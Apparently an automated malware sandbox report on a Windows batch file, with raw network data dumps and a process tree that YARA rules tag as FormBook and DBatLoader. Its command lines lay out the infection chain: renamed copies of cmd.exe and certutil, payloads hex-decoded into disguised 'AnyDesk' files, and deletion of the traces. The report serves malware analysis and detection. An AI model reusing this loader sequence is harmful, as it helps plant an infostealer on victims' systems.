                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 61 62 38 61 46 38 61 74 45 7a 35 75 78 36 69 67 63 68 66 4d 54 79 5a 56 37 59 4a 78 56 5a 51 4b 50 4e 6f 38 66 72 74 34 6f 33 69 70 6b 47 52 37 51 32 72 71 38 30 4b 37 2f 4f 65 73 67 33 32 77 38 2f 6e 52 78 72 62 38 75 44 7a 35 38 66 68 4f 31 63 75 6b 6c 79 35 63 4d 67 50 62 6e 61 34 4c 33 4d 41 72 70 47 53 4a 78 50 33 67 33 56 4e 69 54 51 58 58 61 52 43 36 71 62 45 75 78 47 6f 59 70 67 6a 52 4f 4c 76 43 34 75 37 51 35 64 57 49 47 66 45 6f 47 51 6a 58 66 71 57 52 54 64 72 52 58 4d 72 6e 50 30 67 30 4c 74 42 69 4b 54 77 6a 69 71 75 52 6f 4d 59 4e 67 2b 71 2f 67 43 30 6d 4c 6f 72 6d 64 4b 35 79 34 6a 57 61 74 45 72 4a 54 67 6b 33 4b 51 6c 4b 6a 33 79 50 74 5a 52 2f 6d 42 4e 35 51 54 4f 67 6f 6a 47 54 51 59 49 4c 65 55 4a 43 51 64 42 55 45 4c 56 58 56 33 32
                                                                                                                                                                      Data Ascii: ab8aF8atEz5ux6igchfMTyZV7YJxVZQKPNo8frt4o3ipkGR7Q2rq80K7/Oesg32w8/nRxrb8uDz58fhO1cukly5cMgPbna4L3MArpGSJxP3g3VNiTQXXaRC6qbEuxGoYpgjROLvC4u7Q5dWIGfEoGQjXfqWRTdrRXMrnP0g0LtBiKTwjiquRoMYNg+q/gC0mLormdK5y4jWatErJTgk3KQlKj3yPtZR/mBN5QTOgojGTQYILeUJCQdBUELVXV32
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 53 4d 2b 37 2f 78 59 52 6e 32 52 42 6d 43 64 36 4d 76 46 6e 58 42 4a 6a 32 2f 4b 2b 35 4c 4f 69 58 47 35 48 46 36 6e 4f 77 30 76 66 6b 36 63 59 4a 4c 67 39 63 39 6c 30 66 63 51 6c 6c 6b 67 6e 61 47 31 31 76 4d 73 44 41 67 48 35 61 45 68 44 58 6a 45 77 30 47 35 62 77 61 42 34 45 4b 35 42 62 37 4c 38 64 78 71 59 72 4b 61 74 55 66 77 33 2b 30 69 45 7a 49 53 39 70 46 65 33 42 49 4d 33 76 44 6d 58 30 45 74 43 50 53 50 66 30 56 4c 61 4e 57 4b 67 6e 4c 34 6d 58 6f 65 53 4a 79 53 70 37 6d 32 2b 6d 53 65 4b 49 6b 57 78 65 42 65 43 33 5a 77 58 51 34 6e 30 32 33 70 39 65 7a 2b 69 53 4f 54 52 61 58 67 74 79 7a 49 73 32 62 34 75 74 54 57 75 34 50 50 51 62 37 59 69 55 36 41 71 72 52 4f 32 35 44 59 35 6c 6d 49 70 4d 63 5a 62 4e 4f 50 37 4c 73 5a 69 75 54 6b 67 37 4a 59
                                                                                                                                                                      Data Ascii: SM+7/xYRn2RBmCd6MvFnXBJj2/K+5LOiXG5HF6nOw0vfk6cYJLg9c9l0fcQllkgnaG11vMsDAgH5aEhDXjEw0G5bwaB4EK5Bb7L8dxqYrKatUfw3+0iEzIS9pFe3BIM3vDmX0EtCPSPf0VLaNWKgnL4mXoeSJySp7m2+mSeKIkWxeBeC3ZwXQ4n023p9ez+iSOTRaXgtyzIs2b4utTWu4PPQb7YiU6AqrRO25DY5lmIpMcZbNOP7LsZiuTkg7JY
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 77 56 49 34 4b 31 70 76 6d 38 78 72 68 65 38 65 55 74 55 46 6a 35 41 47 38 42 34 46 42 46 64 76 4b 77 53 64 73 44 39 63 35 68 4f 66 49 54 45 67 59 57 63 54 73 64 2f 49 6b 50 52 33 52 6a 44 66 6f 4d 52 4a 64 62 54 6b 56 75 54 4a 65 43 6e 58 66 2b 6a 73 6a 44 62 63 50 38 6c 31 50 57 4e 36 5a 77 62 75 7a 59 66 6c 58 69 45 56 77 61 49 56 59 49 6d 57 52 5a 70 48 37 53 78 41 44 39 38 57 63 6a 44 4c 79 47 62 74 36 79 51 64 76 63 49 4e 35 61 75 73 6d 4c 68 78 30 43 4f 76 72 78 44 39 39 42 63 2f 58 68 6e 50 56 45 48 50 52 48 33 42 5a 69 43 65 52 59 6a 34 62 70 78 77 4f 2b 74 56 57 4a 48 7a 48 63 42 31 36 4b 4f 45 6e 57 6d 35 57 33 47 44 34 41 32 31 72 41 74 73 72 6a 30 61 49 34 70 55 7a 4b 78 71 4b 73 4a 79 63 56 6c 6d 44 2f 37 4b 4b 35 42 68 4c 79 71 4e 2b 4c 53
                                                                                                                                                                      Data Ascii: wVI4K1pvm8xrhe8eUtUFj5AG8B4FBFdvKwSdsD9c5hOfITEgYWcTsd/IkPR3RjDfoMRJdbTkVuTJeCnXf+jsjDbcP8l1PWN6ZwbuzYflXiEVwaIVYImWRZpH7SxAD98WcjDLyGbt6yQdvcIN5ausmLhx0COvrxD99Bc/XhnPVEHPRH3BZiCeRYj4bpxwO+tVWJHzHcB16KOEnWm5W3GD4A21rAtsrj0aI4pUzKxqKsJycVlmD/7KK5BhLyqN+LS


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:07:22:07
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "
                                                                                                                                                                      Imagebase:0x7ff65bdb0000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:07:22:07
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                                                                                      Imagebase:0x7ff61e160000
                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                      Imagebase:0x7ff61e160000
                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:07:22:08
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\kn.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                      Imagebase:0x7ff685410000
                                                                                                                                                                      File size:1'651'712 bytes
                                                                                                                                                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:07:22:09
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:07:22:09
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\kn.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                      Imagebase:0x7ff685410000
                                                                                                                                                                      File size:1'651'712 bytes
                                                                                                                                                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:07:22:10
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1'392'640 bytes
                                                                                                                                                                      MD5 hash:A8AF2D572217E48EEEBDF7DD135F90CD
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:07:22:10
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:07:22:10
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                                                                                                      Imagebase:0x7ff6e9420000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:07:22:17
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "
                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:07:22:17
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:07:22:18
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                      Imagebase:0x2b0000
                                                                                                                                                                      File size:352'768 bytes
                                                                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:07:22:18
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                                      File size:226'712 bytes
                                                                                                                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:07:22:20
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:07:22:25
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\msdt.exe"
                                                                                                                                                                      Imagebase:0xfe0000
                                                                                                                                                                      File size:389'632 bytes
                                                                                                                                                                      MD5 hash:BAA4458E429E7C906560FE4541ADFCFB
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:07:22:29
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:/c del "C:\Windows\SysWOW64\SndVol.exe"
                                                                                                                                                                      Imagebase:0xa40000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
